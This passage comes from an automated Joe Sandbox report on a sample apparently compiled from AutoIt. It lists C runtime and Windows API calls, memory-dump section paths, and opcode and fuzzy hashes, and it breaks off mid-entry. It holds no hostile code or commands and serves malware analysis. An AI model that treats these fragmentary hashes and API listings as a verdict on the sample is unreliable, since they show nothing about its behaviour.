                                          • String ID:
                                          • API String ID: 3397143404-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00E517F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: CALL
                                          • API String ID: 1385522511-4196123274
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          • _wcslen.LIBCMT ref: 00EB6F6B
                                            • Part of subcall function 00E44ECB: LoadLibraryExW.KERNELBASE ref: 00E44EFD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_wcslen
                                          • String ID: >>>AUTOIT SCRIPT<<<
                                          • API String ID: 3312870042-2806939583
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00E82C8C
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                            • Part of subcall function 00E42DA5: GetLongPathNameW.KERNELBASE ref: 00E42DC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen
                                          • String ID: X
                                          • API String ID: 779396738-3081909835
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID: EA06
                                          • API String ID: 2638373210-3962188686
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          • try_get_function.LIBVCRUNTIME ref: 00E63615
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: try_get_function
                                          • String ID: FlsAlloc
                                          • API String ID: 2742660187-671089009
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E7C74F: GetOEMCP.KERNEL32 ref: 00E7C77A
                                          • IsValidCodePage.KERNEL32 ref: 00E7CBF0
                                          • GetCPInfo.KERNEL32(00000000,00E7CA1D), ref: 00E7CC03
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E72D74: GetLastError.KERNEL32 ref: 00E72D78
                                            • Part of subcall function 00E72D74: _free.LIBCMT ref: 00E72DAB
                                            • Part of subcall function 00E72D74: SetLastError.KERNEL32(00000000,?,?,?,?,00E6E6D1,?,00F08A48,00000010,00E44F4A,?,?,00000000,00E83CD6), ref: 00E72DEC
                                            • Part of subcall function 00E72D74: _abort.LIBCMT ref: 00E72DF2
                                            • Part of subcall function 00E7CADA: _abort.LIBCMT ref: 00E7CB0C
                                            • Part of subcall function 00E7CADA: _free.LIBCMT ref: 00E7CB40
                                            • Part of subcall function 00E7C74F: GetOEMCP.KERNEL32 ref: 00E7C77A
                                          • _free.LIBCMT ref: 00E7CA33
                                          • _free.LIBCMT ref: 00E7CA69
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcAddress.KERNEL32 ref: 00E73037
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E73044
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressProc__crt_fast_encode_pointer
                                          • String ID:
                                          • API String ID: 2279764990-0
                                          • Opcode ID: d068030127168a234b9d5fcf4597232f38fa725d4a8c9b26af8ac68c8331eac6
                                          • Instruction ID: aa8e019ac098b333d652aaae7af7730e76906337178d7e650a4ac758b69e0d26
                                          • Opcode Fuzzy Hash: d068030127168a234b9d5fcf4597232f38fa725d4a8c9b26af8ac68c8331eac6
                                          • Instruction Fuzzy Hash: C2110633A001259FDB719F39EC4099A7395AB807647169220FD19FB258DB31EE01F7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E45773
                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00E84052
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 033bbb1c5a05f75b1dced10dee1e4bb721d609a0d4606901d0bc7b9c9dcb0c56
                                          • Instruction ID: 6d15a3a4836478fabdac8207f5df8289affbf850725ffece3d4fcc213a810a36
                                          • Opcode Fuzzy Hash: 033bbb1c5a05f75b1dced10dee1e4bb721d609a0d4606901d0bc7b9c9dcb0c56
                                          • Instruction Fuzzy Hash: 9E019231145225BBE3301A2AEC0EF977F98EF027B4F109316BAAC7A1E1C7B45854CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E63600: try_get_function.LIBVCRUNTIME ref: 00E63615
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E63432
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E6343D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                          • String ID:
                                          • API String ID: 806969131-0
                                          • Opcode ID: 8f2d47e2eb3c9322a7a26120f96702eed807625fec67c0d031c0fdc7ffaca1d7
                                          • Instruction ID: 24685179f14b48a02e52ff83982b9d61cbf62d72ca74ccd23b263aba77c3a938
                                          • Opcode Fuzzy Hash: 8f2d47e2eb3c9322a7a26120f96702eed807625fec67c0d031c0fdc7ffaca1d7
                                          • Instruction Fuzzy Hash: 8CD0A930AC8301A84C25ABB4B80309DA6809801BF83A03356E430F92C3EF20C3413012
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00E4BB4E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID:
                                          • API String ID: 1385522511-0
                                          • Opcode ID: 98c3ff24d8cb4b0e1e2e02101f32352bc1820215a4c110230e651421c008a256
                                          • Instruction ID: 4fff29daffe4fad177b2dcd80671b64822db806816c8d5fd5fb3958053372cb5
                                          • Opcode Fuzzy Hash: 98c3ff24d8cb4b0e1e2e02101f32352bc1820215a4c110230e651421c008a256
                                          • Instruction Fuzzy Hash: 5432CB30A00209DFCF24CF54D894ABEB7B9EF48308F59A059E915BB261C775ED81DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E44E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E9C
                                            • Part of subcall function 00E44E90: GetProcAddress.KERNEL32 ref: 00E44EAE
                                            • Part of subcall function 00E44E90: FreeLibrary.KERNEL32 ref: 00E44EC0
                                          • LoadLibraryExW.KERNELBASE ref: 00E44EFD
                                            • Part of subcall function 00E44E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E62
                                            • Part of subcall function 00E44E59: GetProcAddress.KERNEL32 ref: 00E44E74
                                            • Part of subcall function 00E44E59: FreeLibrary.KERNEL32 ref: 00E44E87
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$Load$AddressFreeProc
                                          • String ID:
                                          • API String ID: 2632591731-0
                                          • Opcode ID: c39119252a0cb07dfe9a8fb3caf2658819c14422f60f808cd38d1defa03886b3
                                          • Instruction ID: 4f4df9f8cf0b26c3a6d5e97de7540f9d8fc96c9bf4e56092e095eb4d8d772e3b
                                          • Opcode Fuzzy Hash: c39119252a0cb07dfe9a8fb3caf2658819c14422f60f808cd38d1defa03886b3
                                          • Instruction Fuzzy Hash: C811E372700305ABCB14BF70EC02FAD77E5AF40B10F20A42EF546BA1D1EE709A499760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 785d40759ffc415f27517d2d27ed70a453b7496a4c38f8259153bead06069ea0
                                          • Instruction ID: fcb06b9c71d9d634afeaba011a716eba10c105f2fa87694d93f40e85cb711ea8
                                          • Opcode Fuzzy Hash: 785d40759ffc415f27517d2d27ed70a453b7496a4c38f8259153bead06069ea0
                                          • Instruction Fuzzy Hash: 6F11487190410AAFCB05DF58E9449DE7BF4EF48314F108059F818AB312EA70DA11CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a57b4b71896cba527b22f0639098d49ef3269e167dad2277276b6f62e39d6a23
                                          • Instruction ID: 283cf4a2a3abdc387af2578ad0ec5cbf076f8abe7fdc4d40eefc744025a76194
                                          • Opcode Fuzzy Hash: a57b4b71896cba527b22f0639098d49ef3269e167dad2277276b6f62e39d6a23
                                          • Instruction Fuzzy Hash: F4114C312047059FD720CF06E880B67B7F9EF44754F10D42EE9ABAA652C770E949DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E74C7D: RtlAllocateHeap.NTDLL(00000008,00E41129,00000000,?,00E72E29,00000001,00000364,?,?,?,00E6F2DE,00E73863,00F11444,?,00E5FDF5,?), ref: 00E74CBE
                                          • _free.LIBCMT ref: 00E7506C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                          • Instruction ID: c2d0bff0180f7b1879258287233cc13a5a835d79b891e683464194a5c5254960
                                          • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                          • Instruction Fuzzy Hash: 5C012B732047045BE3218E65984195AFBE8FB85370F25451DE198A32C0E6706D05C774
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __alldvrm
                                          • String ID:
                                          • API String ID: 65215352-0
                                          • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                          • Instruction ID: 640277859c1406d6b67a41c61a23d7b72229ea4b97e9e2ae3fcf200b165cada3
                                          • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                          • Instruction Fuzzy Hash: D301B575950308AFDB24DFB4DC457AEB7ECEB00368F10956EE415B7240DA31990087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                          • Instruction ID: b8eb17cdf11a3998efc85cafae312c082b743952add054f68e96690837f246e0
                                          • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                          • Instruction Fuzzy Hash: C4F02D36550A1496D7313A75FD05B9E33D89F623B4F105715F525B33D2CB70D80186A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,00E41129,00000000,?,00E72E29,00000001,00000364,?,?,?,00E6F2DE,00E73863,00F11444,?,00E5FDF5,?), ref: 00E74CBE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 4815d78b99e4ce387eea17c277b3fc820d4131170b5b9c9076ce4f18075874fb
                                          • Instruction ID: fca9cdfb165727252f2019861ed268af999c6c28bfa6431f6343c3dddc3a2784
                                          • Opcode Fuzzy Hash: 4815d78b99e4ce387eea17c277b3fc820d4131170b5b9c9076ce4f18075874fb
                                          • Instruction Fuzzy Hash: 3EF0B4B1643224A6FB225F62AC05F9AB7C8BF417A4B1DE111F91DBA1D4CB31DC0086A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: a20f1b2574c87ba4c12b7482f5c2291f7297ea8a2e0b797283ebaddd8ba1f43e
                                          • Instruction ID: 3547a153486c303656d93628c8176f9e39d9081420111704cf2ff213a7d929b7
                                          • Opcode Fuzzy Hash: a20f1b2574c87ba4c12b7482f5c2291f7297ea8a2e0b797283ebaddd8ba1f43e
